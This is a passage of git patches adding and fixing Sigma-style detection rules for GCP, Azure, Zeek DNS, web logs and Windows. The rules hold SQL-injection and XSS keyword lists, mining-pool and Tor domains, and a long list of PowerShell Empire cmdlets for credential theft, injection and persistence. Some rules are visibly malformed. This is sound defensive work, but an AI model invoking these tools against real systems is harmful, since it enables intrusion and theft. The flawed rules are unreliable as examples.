self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed 'license' fields. (has to be a string )") + def test_optional_tlp(self): faulty_rules = [] valid_tlp = [ From 885bbefe732456963afcec9a56e598d391fd9ff1 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 16:21:16 -0500 Subject: [PATCH 0337/1367] Update gcp_full_network_traffic_packet_capture.yml --- rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml index 321addd3..6b63093e 100644 --- a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml +++ b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml @@ -16,6 +16,7 @@ detection: - v*.Compute.PacketMirrorings.Delete - v*.Compute.PacketMirrorings.Insert - v*.Compute.PacketMirrorings.Patch + - v*.Compute.PacketMirrorings.List condition: selection level: medium tags: From d407a3dd4f324e4f08a2d29e4455a0856c27b271 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 16:24:50 -0500 Subject: [PATCH 0338/1367] Update gcp_firewall_rule_modified_or_deleted.yml --- rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml index 0ab30c2a..da19b154 100644 --- a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml @@ -12,9 +12,10 @@ logsource: detection: selection: gcp.audit.method_name: - - v*.compute.firewalls.delete - - v*.compute.firewalls.patch - - v*.compute.firewalls.update + - v*.Compute.Firewalls.Delete + - v*.Compute.Firewalls.Patch + - v*.Compute.Firewalls.Update + - v*.Compute.Firewalls.Insert condition: selection level: medium tags: From 872c54bc0c68d2ee620f3b8a4c9654d16159954f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 16:50:11 -0500 Subject: [PATCH 0339/1367] Update gcp_full_network_traffic_packet_capture.yml --- rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml index 6b63093e..3c4b43c1 100644 --- a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml +++ b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml @@ -17,6 +17,7 @@ detection: - v*.Compute.PacketMirrorings.Insert - v*.Compute.PacketMirrorings.Patch - v*.Compute.PacketMirrorings.List + - v*.Compute.PacketMirrorings.aggregatedList condition: selection level: medium tags: From 980954751eaac171875c099e2b991c90f65a0856 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 21:53:56 -0500 Subject: [PATCH 0340/1367] Create gcp_bucket_modified_or_deleted.yml --- .../gcp/gcp_bucket_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml diff --git a/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml b/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml new file mode 100644 index 00000000..fc83fef1 --- /dev/null +++ b/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Google Cloud Storage Buckets Modified or Deleted +id: 4d9f2ee2-c903-48ab-b9c1-8c0f474913d0 +description: Detects when storage bucket is modified or deleted in Google Cloud. +author: Austin Songer +status: experimental +date: 2021/08/14 +references: + - https://cloud.google.com/storage/docs/json_api/v1/buckets +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - storage.v*.buckets.delete + - storage.v*.buckets.insert + - storage.v*.buckets.update + - storage.v*.buckets.patch + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From dc386a2eada47c6f30ddbbff08dc641705a43262 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 21:56:29 -0500 Subject: [PATCH 0341/1367] Create gcp_bucket_enumeration.yml --- rules/cloud/gcp/gcp_bucket_enumeration.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/gcp/gcp_bucket_enumeration.yml diff --git a/rules/cloud/gcp/gcp_bucket_enumeration.yml b/rules/cloud/gcp/gcp_bucket_enumeration.yml new file mode 100644 index 00000000..e52b3695 --- /dev/null +++ b/rules/cloud/gcp/gcp_bucket_enumeration.yml @@ -0,0 +1,22 @@ +title: Google Cloud Storage Buckets Enumeration +id: e2feb918-4e77-4608-9697-990a1aaf74c3 +description: Detects when storage bucket is enumerated in Google Cloud. +author: Austin Songer +status: experimental +date: 2021/08/14 +references: + - https://cloud.google.com/storage/docs/json_api/v1/buckets +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - storage.v*.buckets.list + - storage.v*.buckets.listChannels + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From eaf1bd8962d0cff42121f2524be6c510c503db92 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 21:58:06 -0500 Subject: [PATCH 0342/1367] Update gcp_bucket_enumeration.yml --- rules/cloud/gcp/gcp_bucket_enumeration.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/gcp/gcp_bucket_enumeration.yml b/rules/cloud/gcp/gcp_bucket_enumeration.yml index e52b3695..07f8e483 100644 --- a/rules/cloud/gcp/gcp_bucket_enumeration.yml +++ b/rules/cloud/gcp/gcp_bucket_enumeration.yml @@ -14,9 +14,9 @@ detection: - storage.v*.buckets.list - storage.v*.buckets.listChannels condition: selection -level: medium +level: low tags: - - attack.impact + - attack.discovery falsepositives: - Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 28d3e3f6b917d7c4f8b2eed077e4f7483068b91e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 22:07:25 -0500 Subject: [PATCH 0343/1367] Update gcp_bucket_enumeration.yml --- rules/cloud/gcp/gcp_bucket_enumeration.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/gcp/gcp_bucket_enumeration.yml b/rules/cloud/gcp/gcp_bucket_enumeration.yml index 07f8e483..9c075bfc 100644 --- a/rules/cloud/gcp/gcp_bucket_enumeration.yml +++ b/rules/cloud/gcp/gcp_bucket_enumeration.yml @@ -11,8 +11,8 @@ logsource: detection: selection: gcp.audit.method_name: - - storage.v*.buckets.list - - storage.v*.buckets.listChannels + - storage.buckets.list + - storage.buckets.listChannels condition: selection level: low tags: From b5270ddce1057f72decc80f03e892e4b33e5103e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 22:07:50 -0500 Subject: [PATCH 0344/1367] Update gcp_bucket_modified_or_deleted.yml --- rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml b/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml index fc83fef1..416e38ab 100644 --- a/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml @@ -11,10 +11,10 @@ logsource: detection: selection: gcp.audit.method_name: - - storage.v*.buckets.delete - - storage.v*.buckets.insert - - storage.v*.buckets.update - - storage.v*.buckets.patch + - storage.buckets.delete + - storage.buckets.insert + - storage.buckets.update + - storage.buckets.patch condition: selection level: medium tags: From 68087b80f5757bd5823b739edeffa6fa943e1d05 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 22:25:41 -0500 Subject: [PATCH 0345/1367] Create gcp_service_account_modified.yml --- .../gcp/gcp_service_account_modified.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/gcp/gcp_service_account_modified.yml diff --git a/rules/cloud/gcp/gcp_service_account_modified.yml b/rules/cloud/gcp/gcp_service_account_modified.yml new file mode 100644 index 00000000..172bcc7b --- /dev/null +++ b/rules/cloud/gcp/gcp_service_account_modified.yml @@ -0,0 +1,25 @@ +title: Google Cloud Service Account Modified +id: 6b67c12e-5e40-47c6-b3b0-1e6b571184cc +description: Identifies when a service account is modified in Google Cloud. +author: Austin Songer +status: experimental +date: 2021/08/14 +references: + - https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - *.serviceAccounts.patch + - *.serviceAccounts.create + - *.serviceAccounts.update + - *.serviceAccounts.patch + - *.serviceAccounts.enable + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From d0e08aa78bad513fb57a1cd139ca221bb7972403 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 22:26:21 -0500 Subject: [PATCH 0346/1367] Create gcp_service_account_disabled_or_deleted.yml --- ...cp_service_account_disabled_or_deleted.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml diff --git a/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml b/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml new file mode 100644 index 00000000..e7df461f --- /dev/null +++ b/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml @@ -0,0 +1,23 @@ +title: Google Cloud Service Account Disabled or Deleted +id: 13f81a90-a69c-4fab-8f07-b5bb55416a9f +description: Identifies when a service account is disabled or deleted in Google Cloud. +author: Austin Songer +status: experimental +date: 2021/08/14 +references: + - https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - *.serviceAccounts.disable + - *.serviceAccounts.delete + condition: selection +level: medium +tags: + - attack.impact + - attack.t1531 +falsepositives: + - Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 552e1544e4f634cbb02e2e6436af91f51d2d5a48 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 22:30:10 -0500 Subject: [PATCH 0347/1367] Update gcp_service_account_modified.yml --- rules/cloud/gcp/gcp_service_account_modified.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/cloud/gcp/gcp_service_account_modified.yml b/rules/cloud/gcp/gcp_service_account_modified.yml index 172bcc7b..7905e503 100644 --- a/rules/cloud/gcp/gcp_service_account_modified.yml +++ b/rules/cloud/gcp/gcp_service_account_modified.yml @@ -11,11 +11,11 @@ logsource: detection: selection: gcp.audit.method_name: - - *.serviceAccounts.patch - - *.serviceAccounts.create - - *.serviceAccounts.update - - *.serviceAccounts.patch - - *.serviceAccounts.enable + - *serviceAccounts.patch + - *serviceAccounts.create + - *serviceAccounts.update + - *serviceAccounts.patch + - *serviceAccounts.enable condition: selection level: medium tags: From 3e151410ca67ad636e46733e69ff0914d4ed5d00 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 22:31:47 -0500 Subject: [PATCH 0348/1367] Update gcp_service_account_modified.yml --- rules/cloud/gcp/gcp_service_account_modified.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/cloud/gcp/gcp_service_account_modified.yml b/rules/cloud/gcp/gcp_service_account_modified.yml index 7905e503..172bcc7b 100644 --- a/rules/cloud/gcp/gcp_service_account_modified.yml +++ b/rules/cloud/gcp/gcp_service_account_modified.yml @@ -11,11 +11,11 @@ logsource: detection: selection: gcp.audit.method_name: - - *serviceAccounts.patch - - *serviceAccounts.create - - *serviceAccounts.update - - *serviceAccounts.patch - - *serviceAccounts.enable + - *.serviceAccounts.patch + - *.serviceAccounts.create + - *.serviceAccounts.update + - *.serviceAccounts.patch + - *.serviceAccounts.enable condition: selection level: medium tags: From db3eda51ddb1a85ab03ef4bbf49b87cb3237ff29 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 15 Aug 2021 08:02:51 +0200 Subject: [PATCH 0349/1367] fix errors --- rules/cloud/gcp/gcp_service_account_modified.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/rules/cloud/gcp/gcp_service_account_modified.yml b/rules/cloud/gcp/gcp_service_account_modified.yml index 172bcc7b..5f869897 100644 --- a/rules/cloud/gcp/gcp_service_account_modified.yml +++ b/rules/cloud/gcp/gcp_service_account_modified.yml @@ -10,12 +10,12 @@ logsource: service: gcp.audit detection: selection: - gcp.audit.method_name: - - *.serviceAccounts.patch - - *.serviceAccounts.create - - *.serviceAccounts.update - - *.serviceAccounts.patch - - *.serviceAccounts.enable + gcp.audit.method_name|endswith: + - .serviceAccounts.patch + - .serviceAccounts.create + - .serviceAccounts.update + - .serviceAccounts.disable + - .serviceAccounts.enable condition: selection level: medium tags: From d940417e58219a8b43e227cde0bac50d02187466 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 15 Aug 2021 08:05:03 +0200 Subject: [PATCH 0350/1367] fix error --- rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml b/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml index e7df461f..dcc886d4 100644 --- a/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml +++ b/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml @@ -10,9 +10,9 @@ logsource: service: gcp.audit detection: selection: - gcp.audit.method_name: - - *.serviceAccounts.disable - - *.serviceAccounts.delete + gcp.audit.method_name|endswith: + - .serviceAccounts.disable + - .serviceAccounts.delete condition: selection level: medium tags: From f34c3ef9fdfd6a8864a26d4d8c34318605424016 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 15 Aug 2021 08:08:16 +0200 Subject: [PATCH 0351/1367] remove disable as in another rule --- rules/cloud/gcp/gcp_service_account_modified.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_service_account_modified.yml b/rules/cloud/gcp/gcp_service_account_modified.yml index 5f869897..9b3deb2b 100644 --- a/rules/cloud/gcp/gcp_service_account_modified.yml +++ b/rules/cloud/gcp/gcp_service_account_modified.yml @@ -14,8 +14,8 @@ detection: - .serviceAccounts.patch - .serviceAccounts.create - .serviceAccounts.update - - .serviceAccounts.disable - .serviceAccounts.enable + - .serviceAccounts.undelete condition: selection level: medium tags: From a75859a976409df0a3c3705f01efba97859eda23 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 15 Aug 2021 16:00:14 +0200 Subject: [PATCH 0352/1367] First commit --- ...reating_number_of_resources_detection.yaml | 20 + .../azure_granting_permission_detection.yml | 20 + rules/cloud/azure/azure_rare_operations.yml | 25 ++ rules/network/zeek/zeek_dns_mining_pools.yml | 43 +++ rules/network/zeek/zeek_dns_torproxy.yml | 21 + rules/web/sql_injection_keywords.yml | 23 ++ rules/web/xss_keywords.yml | 24 ++ .../builtin/win_anomaly_process_execution.yml | 22 ++ .../windows/builtin/win_event_log_cleared.yml | 22 ++ .../builtin/win_powershelll_empire.yml | 363 ++++++++++++++++++ .../builtin/win_user_acc_added_removed.yml | 25 ++ .../builtin/win_user_acc_created_deleted.yml | 18 + .../builtin/win_user_acc_enabled_disabled.yml | 20 + ...in_user_created_added_to_bultin_admins.yml | 21 + 14 files changed, 667 insertions(+) create mode 100644 rules/cloud/azure/azure_creating_number_of_resources_detection.yaml create mode 100644 rules/cloud/azure/azure_granting_permission_detection.yml create mode 100644 rules/cloud/azure/azure_rare_operations.yml create mode 100644 rules/network/zeek/zeek_dns_mining_pools.yml create mode 100644 rules/network/zeek/zeek_dns_torproxy.yml create mode 100644 rules/web/sql_injection_keywords.yml create mode 100644 rules/web/xss_keywords.yml create mode 100644 rules/windows/builtin/win_anomaly_process_execution.yml create mode 100644 rules/windows/builtin/win_event_log_cleared.yml create mode 100644 rules/windows/builtin/win_powershelll_empire.yml create mode 100644 rules/windows/builtin/win_user_acc_added_removed.yml create mode 100644 rules/windows/builtin/win_user_acc_created_deleted.yml create mode 100644 rules/windows/builtin/win_user_acc_enabled_disabled.yml create mode 100644 rules/windows/builtin/win_user_created_added_to_bultin_admins.yml diff --git a/rules/cloud/azure/azure_creating_number_of_resources_detection.yaml b/rules/cloud/azure/azure_creating_number_of_resources_detection.yaml new file mode 100644 index 00000000..d1a60829 --- /dev/null +++ b/rules/cloud/azure/azure_creating_number_of_resources_detection.yaml @@ -0,0 +1,20 @@ +title: number of resource creation or deployment activities +id: d2d901db-7a75-45a1-bc39-0cbf00812192 +status: experimental +author: sawwinnnaung +date: 2020/05/07 +description: Number of VM creations or deployment activities occur in Azure via the AzureActivity log. +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml +logsource: + service: AzureActivity +detection: + keywords: + - Microsoft.Compute/virtualMachines/write + - Microsoft.Resources/deployments/write + condition: keywords +level: medium +falsepositives: + - Valid change +tags: + - attack.t1098 diff --git a/rules/cloud/azure/azure_granting_permission_detection.yml b/rules/cloud/azure/azure_granting_permission_detection.yml new file mode 100644 index 00000000..cf644a6b --- /dev/null +++ b/rules/cloud/azure/azure_granting_permission_detection.yml @@ -0,0 +1,20 @@ +title: Granting of permissions to an account +id: a622fcd2-4b5a-436a-b8a2-a4171161833c +status: experimental +author: sawwinnnaung +date: 2020/05/07 +description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml +logsource: + service: AzureActivity +detection: + keywords: + - Microsoft.Authorization/roleAssignments/write + + condition: keywords +level: medium +falsepositives: + - Valid change +tags: + - attack.t1098 diff --git a/rules/cloud/azure/azure_rare_operations.yml b/rules/cloud/azure/azure_rare_operations.yml new file mode 100644 index 00000000..caa65c03 --- /dev/null +++ b/rules/cloud/azure/azure_rare_operations.yml @@ -0,0 +1,25 @@ +title: Rare subscription-level operations in Azure +id: c1182e02-49a3-481c-b3de-0fadc4091488 +status: experimental +author: sawwinnnaung +date: 2020/05/07 +description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureActivity/RareOperations.yaml +logsource: + service: AzureActivity +detection: + keywords: -Microsoft.DocumentDB/databaseAccounts/listKeys/action + -Microsoft.Maps/accounts/listKeys/action + -Microsoft.Media/mediaservices/listKeys/action + -Microsoft.CognitiveServices/accounts/listKeys/action + -Microsoft.Storage/storageAccounts/listKeys/action + -Microsoft.Compute/snapshots/write + -Microsoft.Network/networkSecurityGroups/write + + condition: keywords +level: medium +falsepositives: + - Valid change +tags: + - attack.t1003 diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml new file mode 100644 index 00000000..f45df340 --- /dev/null +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -0,0 +1,43 @@ +id: bf74135c-18e8-4a72-a926-0e4f47888c19 +title: DNS events related to mining pools +description: | + 'Identifies IPs that may be performing DNS lookups associated with common currency mining pools.' +reference: Azure Sentinel +author: Saw Winn Naung +severity: Medium +logsource: + service: dns + product: zeek +tags: + - attack.t1035 + - attack.t1496 +detection: + selection: + query: + - 'monerohash.com' + - 'do-dear.com' + - 'xmrminerpro.com' + - 'secumine.net' + - 'xmrpool.com' + - 'minexmr.org' + - 'hashanywhere.com' + - 'xmrget.com' + - 'mininglottery.eu' + - 'minergate.com' + - 'moriaxmr.com' + - 'multipooler.com' + - 'moneropools.com' + - 'xmrpool.eu' + - 'coolmining.club' + - 'supportxmr.com' + - 'minexmr.com' + - 'coinfoundry.org' + - 'cryptoknight.cc' + - 'fairhash.org' + - 'baikalmine.com' + - 'tubepool.xyz' + - 'fairpool.xyz' + - 'asiapool.io' + condition: selection +fields: + - clientip diff --git a/rules/network/zeek/zeek_dns_torproxy.yml b/rules/network/zeek/zeek_dns_torproxy.yml new file mode 100644 index 00000000..1249c6ad --- /dev/null +++ b/rules/network/zeek/zeek_dns_torproxy.yml @@ -0,0 +1,21 @@ +id: a8322756-015c-42e7-afb1-436e85ed3ff5 +title: DNS tor proxies +description: | + 'Identifies IPs performing DNS lookups associated with common Tor proxies.' +reference: Azure Sentinel +author: Saw Winn Naung +severity: Medium +logsource: + service: dns + product: zeek +tags: + - attack.t1048 +detection: + selection: + query: + - 'tor2web.*' + - 'onion.*' + - '*tor-gateways*' + condition: selection +fields: + - clientip diff --git a/rules/web/sql_injection_keywords.yml b/rules/web/sql_injection_keywords.yml new file mode 100644 index 00000000..f1dd7972 --- /dev/null +++ b/rules/web/sql_injection_keywords.yml @@ -0,0 +1,23 @@ +title: Detect sql injection by keywords +id: 5513deaf-f49a-46c2-a6c8-3f111b5cb453 +status: experimental +description: Detects sql injection that use GET requests by keyword searches in URL strings +author: Saw Win Naung +date: 2020/02/22 +logsource: + category: webserver +detection: + keywords: + - '=select' + - '=union' + - '=concat' + condition: keywords +fields: + - client_ip + - vhost + - url + - response +falsepositives: + - Java scripts and CSS Files + - User searches in search boxes of the respective website +level: high diff --git a/rules/web/xss_keywords.yml b/rules/web/xss_keywords.yml new file mode 100644 index 00000000..2c17f38b --- /dev/null +++ b/rules/web/xss_keywords.yml @@ -0,0 +1,24 @@ +title: Detect XSS Attempts by keywords +id: 553a450b8-604d-41a9-8587-a28334aaddfb +status: experimental +description: Detects XSS that use GET requests by keyword searches in URL strings +author: Saw Win Naung +date: 2020/02/22 +logsource: + category: webserver +detection: + keywords: + - '=cookie' + - '=script' + - '=onload' + - '=onmouseover' + condition: keywords +fields: + - client_ip + - vhost + - url + - response +falsepositives: + - Java scripts,CSS Files and PNG files + - User searches in search boxes of the respective website +level: high diff --git a/rules/windows/builtin/win_anomaly_process_execution.yml b/rules/windows/builtin/win_anomaly_process_execution.yml new file mode 100644 index 00000000..1a38f02a --- /dev/null +++ b/rules/windows/builtin/win_anomaly_process_execution.yml @@ -0,0 +1,22 @@ +title: Process execution anomaly +id: 2c55fe7a-b06f-4029-a5b9-c54a2320d7b8 +description: 'Identifies anomalous executions of sensitive processes which are often leveraged as attack vectors.' +references: Azure Sentinel +level: Medium +logsource: + service: Security + product: windows +tags: + - attack.execution + - attack.t1064 +detection: + selection: + EventID: 4688 + NewProcessName|contains: + - 'powershell.exe' + - 'cmd.exe' + - 'wmic.exe' + - 'psexec.exe' + - 'cacls.exe' + - 'rundll.exe' + condition: selection diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml new file mode 100644 index 00000000..2540d98e --- /dev/null +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -0,0 +1,22 @@ +id: a122ac13-daf8-4175-83a2-72c387be339d +title: Security Event log cleared +status: experimental +description: | + 'Checks for event id 1102 which indicates the security event log was cleared.' +reference: Azure Sentinel +author: Saw Winn Naung +severity: Medium +logsource: + service: security + product: windows +tags: + + - attack.t1107 +detection: + selection: + EventID: 1102 + condition: selection +fields: + - fields in the log source that are important to investigate further +falsepositives: + - Legitimate administrative activity diff --git a/rules/windows/builtin/win_powershelll_empire.yml b/rules/windows/builtin/win_powershelll_empire.yml new file mode 100644 index 00000000..f3883029 --- /dev/null +++ b/rules/windows/builtin/win_powershelll_empire.yml @@ -0,0 +1,363 @@ +title: Powershell Empire cmdlets seen in command line +id: ef88eb96-861c-43a0-ab16-f3835a97c928 +description: | + 'Identifies instances of PowerShell Empire cmdlets in powershell process command line data.' +references: Azure Sentinel +level: Medium +logsource: + service: Security + product: windows +tags: + - attack.execution + - attack.persistence + - attack.t1208 +detection: + selection1: + EventID: 4688 + CommandLine|contains: ' -encodedCommand' + selection2: + CommandLine: + - 'SetDelay' + - 'GetDelay' + - 'Set-LostLimit' + - 'Get-LostLimit' + - 'Set-Killdate' + - 'Get-Killdate' + - 'Set-WorkingHours' + - 'Get-WorkingHours' + - 'Get-Sysinfo' + - 'Add-Servers' + - 'Invoke-ShellCommand' + - 'Start-AgentJob' + - 'Update-Profile' + - 'Get-FilePart' + - 'Encrypt-Bytes' + - 'Decrypt-Bytes' + - 'Encode-Packet' + - 'Decode-Packet' + - 'Send-Message' + - 'Process-Packet' + - 'Process-Tasking' + - 'Get-Task' + - 'Start-Negotiate' + - 'Invoke-DllInjection' + - 'Invoke-ReflectivePEInjection' + - 'Invoke-Shellcode' + - 'Invoke-ShellcodeMSIL' + - 'Get-ChromeDump' + - 'Get-ClipboardContents' + - 'Get-IndexedItem' + - 'Get-Keystrokes' + - 'Invoke-Inveigh' + - 'Invoke-NetRipper' + - 'local:Invoke-PatchDll' + - 'Invoke-NinjaCopy' + - 'Get-Win32Types' + - 'Get-Win32Constants' + - 'Get-Win32Functions' + - 'Sub-SignedIntAsUnsigned' + - 'Add-SignedIntAsUnsigned' + - 'Compare-Val1GreaterThanVal2AsUInt' + - 'Convert-UIntToInt' + - 'Test-MemoryRangeValid' + - 'Write-BytesToMemory' + - 'Get-DelegateType' + - 'Get-ProcAddress' + - 'Enable-SeDebugPrivilege' + - 'Invoke-CreateRemoteThread' + - 'Get-ImageNtHeaders' + - 'Get-PEBasicInfo' + - 'Get-PEDetailedInfo' + - 'Import-DllInRemoteProcess' + - 'Get-RemoteProcAddress' + - 'Copy-Sections' + - 'Update-MemoryAddresses' + - 'Import-DllImports' + - 'Get-VirtualProtectValue' + - 'Update-MemoryProtectionFlags' + - 'Update-ExeFunctions' + - 'Copy-ArrayOfMemAddresses' + - 'Get-MemoryProcAddress' + - 'Invoke-MemoryLoadLibrary' + - 'Invoke-MemoryFreeLibrary' + - 'Out-Minidump' + - 'Get-VaultCredential' + - 'Invoke-DCSync' + - 'Translate-Name' + - 'Get-NetDomain' + - 'Get-NetForest' + - 'Get-NetForestDomain' + - 'Get-DomainSearcher' + - 'Get-NetComputer' + - 'Get-NetGroupMember' + - 'Get-NetUser' + - 'Invoke-Mimikatz' + - 'Invoke-PowerDump' + - 'Invoke-TokenManipulation' + - 'Exploit-JMXConsole' + - 'Exploit-JBoss' + - 'Invoke-Thunderstruck' + - 'Invoke-VoiceTroll' + - 'Set-WallPaper' + - 'Invoke-PsExec' + - 'Invoke-SSHCommand' + - 'Invoke-PSInject' + - 'Invoke-RunAs' + - 'Invoke-SendMail' + - 'Invoke-Rule' + - 'Get-OSVersion' + - 'Select-EmailItem' + - 'View-Email' + - 'Get-OutlookFolder' + - 'Get-EmailItems' + - 'Invoke-MailSearch' + - 'Get-SubFolders' + - 'Get-GlobalAddressList' + - 'Invoke-SearchGAL' + - 'Get-SMTPAddress' + - 'Disable-SecuritySettings' + - 'Reset-SecuritySettings' + - 'Get-OutlookInstance' + - 'New-HoneyHash' + - 'Set-MacAttribute' + - 'Invoke-PatchDll' + - 'Get-SecurityPackages' + - 'Install-SSP' + - 'Invoke-BackdoorLNK' + - 'New-ElevatedPersistenceOption' + - 'New-UserPersistenceOption' + - 'Add-Persistence' + - 'Invoke-CallbackIEX' + - 'Add-PSFirewallRules' + - 'Invoke-EventLoop' + - 'Invoke-PortBind' + - 'Invoke-DNSLoop' + - 'Invoke-PacketKnock' + - 'Invoke-CallbackLoop' + - 'Invoke-BypassUAC' + - 'Get-DecryptedCpassword' + - 'Get-GPPInnerFields' + - 'Invoke-WScriptBypassUAC' + - 'Get-ModifiableFile' + - 'Get-ServiceUnquoted' + - 'Get-ServiceFilePermission' + - 'Get-ServicePermission' + - 'Invoke-ServiceUserAdd' + - 'Invoke-ServiceCMD' + - 'Write-UserAddServiceBinary' + - 'Write-CMDServiceBinary' + - 'Write-ServiceEXE' + - 'Write-ServiceEXECMD' + - 'Restore-ServiceEXE' + - 'Invoke-ServiceStart' + - 'Invoke-ServiceStop' + - 'Invoke-ServiceEnable' + - 'Invoke-ServiceDisable' + - 'Get-ServiceDetail' + - 'Find-DLLHijack' + - 'Find-PathHijack' + - 'Write-HijackDll' + - 'Get-RegAlwaysInstallElevated' + - 'Get-RegAutoLogon' + - 'Get-VulnAutoRun' + - 'Get-VulnSchTask' + - 'Get-UnattendedInstallFile' + - 'Get-Webconfig' + - 